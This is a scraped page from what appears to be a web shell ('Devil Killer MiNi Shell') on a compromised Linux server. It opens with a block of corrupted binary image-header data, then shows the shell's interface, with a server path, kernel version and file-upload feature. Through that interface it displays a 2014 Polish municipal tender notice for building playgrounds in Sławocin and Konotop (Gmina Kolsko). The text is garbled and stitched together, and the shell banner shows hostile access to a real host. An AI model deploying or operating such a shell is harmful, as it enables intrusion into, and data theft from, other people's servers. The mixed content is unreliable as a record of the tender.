JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140227/67102-N-2014.html

<p class="kh_header"><b>Kolsko: Budowa placów zabaw na terenie Gminy Kolsko</b><br>
<b>Numer ogłoszenia: 67102 - 2014; data zamieszczenia: 27.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kolsko , ul. Piastowska 12, 67-415 Kolsko, woj. lubuskie, tel. 068 3524177, faks 068 3524355.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa placów zabaw na terenie Gminy Kolsko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest budowa placów zabaw na terenie Gminy Kolsko. Przedmiot zamówienia został podzielony na dwie części: CZĘŚĆ 1: Budowa placu zabaw w miejscowości Sławocin, działka nr. 45/5; CZĘŚĆ 2: Budowa placu zabaw w miejscowości Konotop, ul. Plac Powstańców Wlkp. 7 - teren przy Szkole Podstawowej im. Marii Skłodowskiej - Curie w Konotopie. 
 2. Wszystkie urządzenia muszą spełniać następujące warunki:
- posiadać minimum trzyletnią gwarancję,
- posiadać wysoka odporność na wpływ warunków atmosferycznych (deszcz, słońce, śnieg) oraz na uszkodzenia mechaniczne (uderzenia, obciążenia),
- posiadać odpowiednie certyfikaty za zgodność z normą PN-EN 1176,
- wszystkie materiały powinny być fabrycznie nowe, tzn. że żadna część składająca się na dany wyrób nie może być wcześniej używana.
3. Zamawiający wymaga, aby urządzenia placów zabaw zarówno w 1 jak i 2 części przedmiotu zamówienia były zamontowane w gruncie w sposób opisany w projekcie budowlanym dotyczącym Budowy placu zabaw w miejscowości Sławocin, działka nr. 45/5.
4. Na potwierdzenie spełnienia przez oferowane dostawy wymagań określonych przez Zamawiającego, Zamawiający żąda dołączenia do oferty opisów produktów oraz zdjęć, wizerunków bądź kart graficznych wszystkich urządzeń wymienionych w przedmiocie zamówienia (w tym także ławki, kosze na śmieci oraz stojak na rowery).
5. Przedmiot zamówienia nie obejmuje wykonania nawierzchni bezpiecznej pod urządzeniami placów zabaw. 
6. Wymiary elementów wyposażenia placów zabaw określone w przedmiocie zamówienia są wymiarami przybliżonymi. Zamawiający dopuszcza odstępstwa od podanych wymiarów w stosunku +/- 20%.
7. W części 2 przedmiotu zamówienia elementy wyposażenia przeznaczone do zabawy powinny posiadać określone strefy bezpieczeństwa zgodnie z specyfiką producenta danej zabawki, natomiast w części 1 podane są maksymalne strefy bezpieczeństwa.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 37.53.52.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wysokość wadium.
Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości:
CZĘŚĆ 1: 1.700,00 zł	(słownie: jeden tysiąc siedemset złotych 00/100)
CZĘŚĆ 2:    700,00 zł	(słownie: siedemset złotych 00/100)

2.Forma wadium.
Wadium może być wniesione w:
a) pieniądzu
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109 poz. 1158 z późn. zm.)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełnienia szczegółowych warunków dotyczących przedmiotowego punktu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie,  co najmniej 2 roboty budowlane polegające na budowie placu zabaw o wartości minimum 50.000,00 zł brutto każda. W przypadku robót budowlanych, których wartość została wyrażona w umowie w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia inwestycji (w przypadku dostaw rozliczanych wyłącznie w walutach innych niż PLN).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełnienia szczegółowych warunków dotyczących przedmiotowego punktu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełnienia szczegółowych warunków dotyczących przedmiotowego punktu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. Dla potwierdzenia spełnienia wyżej opisanego warunku Wykonawca winien złożyć opłaconą polisę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Na potwierdzenie spełnienia przez oferowane dostawy wymagań określonych przez Zamawiającego, Zamawiający żąda dołączenia do oferty opisów produktów oraz zdjęć, wizerunków bądź kart graficznych wszystkich urządzeń wymienionych w przedmiocie zamówienia (w tym także ławki, kosze na śmieci oraz stojak na rowery).</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Formularz oferty - zgodnie z załącznikiem nr 1 do SIWZ. - Pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą. - Zestawienie kosztów Część 1 - zgodnie z załącznikiem nr 5a do SIWZ (w przypadku składania oferty tylko na Część 1 zamówienia). - Zestawienie kosztów Część 2 - zgodnie z załącznikiem nr 5b do SIWZ (w przypadku składania oferty tylko na Część 2 zamówienia). - Zestawienie kosztów Część 1 i Zestawienie kosztów Część 2 - zgodnie z załącznikami nr 5a i 5b do SIWZ (w przypadku składania oferty zarówno na Część 1 jak i Część 2 zamówienia) - Dowód wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający   przewiduje możliwość dokonania zmian po zawarciu umowy w sprawie zamówienia publicznego, pod warunkiem podpisania aneksu zaakceptowanego przez obie Strony. W szczególności Zamawiający dopuszcza: 
a) aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę   adresu siedziby, zmianę formy prawnej itp.,
b) zmianę terminów realizacji zamówienia z przyczyn niezależnych od Wykonawcy lub  Zamawiającego, które to przyczyny każda ze Stron musi udokumentować, pod  warunkiem, że takiej zgody udzieli instytucja dofinansowująca i że Zamawiający nie straci dofinansowania.  
c) jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym  wpływ na realizację przedmiotu zamówienia, 
d) ze względu na dofinansowane zadania możliwa jest zmiana umowy w zakresie konieczności dostosowania umowy z Wykonawcą do postanowień umowy o dofinansowanie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kolsko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kolsko, ul. Piastowska 12, 67-415 Kolsko, pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2014 godzina 09:00, miejsce: Urząd Gminy Kolsko, ul. Piastowska 12, 67-415 Kolsko, pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Programu Rozwoju Obszarów Wiejskich Odnowa i Rozwój Wsi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa placu zabaw w miejscowości Sławocin, działka nr. 45/5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje w szczególności:
1. Zagospodarowanie terenu:
a) utwardzenie terenu: chodnik o nawierzchni betonowej wykonanej z kostki brukowej gr. 8 cm kolor brązowy, stanowiący dojście do placu zabaw. Układ konstrukcyjny nawierzchni i podbudowy chodników:
- nawierzchnia z kostki brukowej betonowej gr. 8 cm,
- podsypka cementowo-piaskowa gr. 3 cm,
- podbudowa z tłucznia kamiennego gr. 10 cm, granulacji 4 - 31,5 mm.
b) ogrodzenie terenu z paneli systemowych, malowanych proszkowo, panele ogrodzeniowe z siatki wysokości min. 132 cm. Długość ogrodzenia 79,10 m.
2. Zakup, dostarczenie i montaż następujących urządzeń placu zabaw:
a) zestaw zabawowy, składający się z następujących elementów: 2 wieży z dachem, trapu wejściowego, zjeżdżalni, pomostu łukowego, kratownicy linowej, pomostu stałego, wieży średniej bez dachu, rury strażackiej i trapu wejściowego schodkowego.
- wymiary: dł. 4,5 m, szer. 6,3 m, wys. 2,5 m (+/- 20%)
- strefa bezpieczeństwa: maksymalnie 13,5 m x 11,0 m.
b) huśtawka podwójna - 1 szt.
- drewniana
- siedziska typu kubełek gumowe (dla dzieci do lat 5)
- wymiary: dł. 3,20 m, szer. 1,90 m, wys. 2,20 m (+/- 20%)
- strefa bezpieczeństwa: maksymalnie 6,0 m x 7,8 m
c) huśtawka równoważna - 1 szt.
- drewniana
- wymiary: dł. 3,00 m, szer. 0,40 m, wys. 0,90 m (+/- 20%)
- strefa bezpieczeństwa: maksymalnie 3,0 m x 6,0 m
d) piaskownica sześciokątna - 1 szt.
- drewniana
- wymiary: dł. 3,00 m, szer. 3,00 m, wys. 0,30 m (+/- 20%)
- strefa bezpieczeństwa: maksymalnie 5,5 m x 5,5 m
e) bujak sprężynowy - motor - 1 szt.
- wykonany ze sklejki wodoodpornej
- wymiary: dł. 1,00 m, szer. 0,25 m, wys. 0,90 m (+/- 20%)
- strefa bezpieczeństwa: maksymalnie 3,5 m x 4,5 m
f) kosz na śmieci - 3 szt, stelaż ze stali zwyklej lub nierdzewnej. Kosz z drewnianym olistwowaniem. Pojemniki wewnętrzne z ocynkowanej ogniowo blachy stalowej.
- wymiary: średnica 660 mm, wysokość 1,0 m (+/- 20%)
g) ławka - 3 szt, konstrukcja z betonu płukanego w szarym kolorze. Siedzisko z drewnianym olistwowaniem. Listwy z drewna iglastego. 
- wymiary: dł. 1,95 m, szer. 0,47 m, wys. 0,44 m (+/- 20%)
h) stojak na rowery - 1 szt, w formie spirali z betonowymi cokołami z giętych profili ze stali okrągłej O 20 mm, z przyspawanymi stalowymi podłużnicami. Główna konstrukcja stojaka mocowana za pomocą ramy do dwóch bocznych cokołów betonowych.
- wymiary: dł. 2,48 m, szer. 0,41 m. wys. 0,45 m (+/- 20%).

Zamawiający załącza do SIWZ projekt budowlany - stanowiący załącznik nr 7 do SIWZ oraz przedmiar robót - stanowiący załącznik nr 8 do SIWZ. Dokumenty te szczegółowo opisują pierwszą część przedmiotu zamówienia, tj. Budowę placu zabaw w miejscowości Sławocin, działka nr. 45/5. 
Przedmiar robót składa się z dwóch części: z przedmiaru robót - koszty kwalifikowane i przedmiaru robót - koszty niekwalifikowane. Podział ten wynika z umowy zawartej z Samorządem Województwa Lubuskiego i nie ma on znaczenia dla przedmiotu zamówienia. Cena ofertowa obejmować ma wszystkie koszty ujęte w obydwóch przedmiarach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa placu zabaw w miejscowości Konotop, ul. Plac Powstańców Wlkp. 7 - teren przy Szkole Podstawowej im. Marii Skłodowskiej - Curie w Konotopie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje montaż następujących urządzeń:
a. Zestaw zabawowy - 1 szt.
- zestaw zawiera: 1 drabinkę krzyżakową, 1 przeplotnię drewnianą, 1 wieżę z dachem z 1 zjeżdżalnią i 1 trapu wejściowego schodkowego, 1 pomost wiszący, 1 trap wejściowy, 
- drewno sosnowe rdzeniowe, toczone cylindrycznie, impregnowane metodą próżniowo-ciśnieniową, osadzone w betonowych fundamentach,
- ślizg wykonany ze stali nierdzewnej,
- trwale posadowiony w gruncie,
b. Huśtawka metalowa podwójna - 1 szt.
- wymiary: dł. 3,20 m, szer. 1,60 m, wys. 2,15 m (+/- 20%)
- konstrukcja huśtawki wykonana jest z rur stalowych,
- zawiesia huśtawki wykonano z łańcucha,
- dwa siedziska - gumowe koszyki. 
c. Karuzela tarczowa z siedziskami - 1 szt.
- karuzela platformowa z siedziskami i centralnie umieszczonym uchwytem umożliwiającym wprowadzenie karuzeli w ruch. Podstawa urządzenia pokryta ryflowaną blachą aluminiową (antypoślizgową). Do platformy przykręcona poręcz wykonana z rur z siedzeniami. 
- karuzela o średnicy 1,50 m (+/- 20%) wykonana z rur stalowych 
d. Huśtawka ważka (pion metalowy) - 2 szt.
- huśtawka dwuosobowa na pionie metalowym,
- belka wykonana z drewna sosnowego rdzeniowego okrągłego, 
- siedziska wykonane ze sklejki wodoodpornej,
- ze względów bezpieczeństwa zamontowane na końcach belki gumowe odbojniki amortyzujące,
- trwale posadowiona w gruncie poprzez zacementowanie,
- wymiary: dł. 3,00 m, szer. 0,40 m, wys. 0,80 m (+/- 20%)
e. Bujak na sprężynie - konik - 1 szt.
- drewniany z elementami tworzywa,
- drewno sosnowe rdzeniowe, toczone cylindrycznie, impregnowane metodą próżniowo-ciśnieniową, osadzone w betonowych fundamentach,
- podpora-sprężyna stalowa, na której urządzenie się kołysze, przystosowana do urządzeń stosowanych na placach zabaw,
- wymiary: dł. 1,20 m, szer. 0,30 m, wys. 0,90 m (+/- 20%)
f. Bujak na sprężynie - kogut - 1 szt.
- drewniany z elementami tworzywa,
- drewno sosnowe rdzeniowe, toczone cylindrycznie, impregnowane metodą próżniowo-ciśnieniową, osadzone w betonowych fundamentach,
- podpora-sprężyna stalowa, na której urządzenie się kołysze, przystosowana do urządzeń stosowanych na placach zabaw,
- wymiary: dł. 1,10 m, szer. 0,30 m, wys. 0,85 m (+/- 20%)
g. Bujak na sprężynie - rower - 1 szt.
- drewniany z elementami tworzywa,
- drewno sosnowe rdzeniowe, toczone cylindrycznie, impregnowane metodą próżniowo-ciśnieniową, osadzone w betonowych fundamentach,
- podpora-sprężyna stalowa, na której urządzenie się kołysze, przystosowana do urządzeń stosowanych na placach zabaw,
- wymiary: dł. 1,00 m, szer. 0,35 m, wys. 0,85 m (+/- 20%).
h. Bujak na sprężynie - żaba - 1 szt.
- drewniany z elementami tworzywa,
- drewno sosnowe rdzeniowe, toczone cylindrycznie, impregnowane metodą próżniowo-ciśnieniową, osadzone w betonowych fundamentach,
- podpora-sprężyna stalowa, na której urządzenie się kołysze, przystosowana do urządzeń stosowanych na placach zabaw,
- wymiary: dł. 0,80 m, szer. 0,50 m, wys. 0,80 m (+/- 20%)
i. Piaskownica sześciokątna 1 szt.
- drewniana - wykonana z bali, drewno sosnowe rdzeniowe, toczone cylindrycznie, impregnowane metodą próżniowo-ciśnieniową, osadzone w betonowych fundamentach,
 - wymiary: dł. 3,00 m, szer. 3,00 m, wys. 0,30 m (+/- 20%)
j. Kosz na śmieci - 1 szt.
- drewniany  - drewno  sosnowe rdzeniowe, toczone cylindrycznie, impregnowane metodą próżniowo-ciśnieniową, osadzone w betonowych fundamentach,
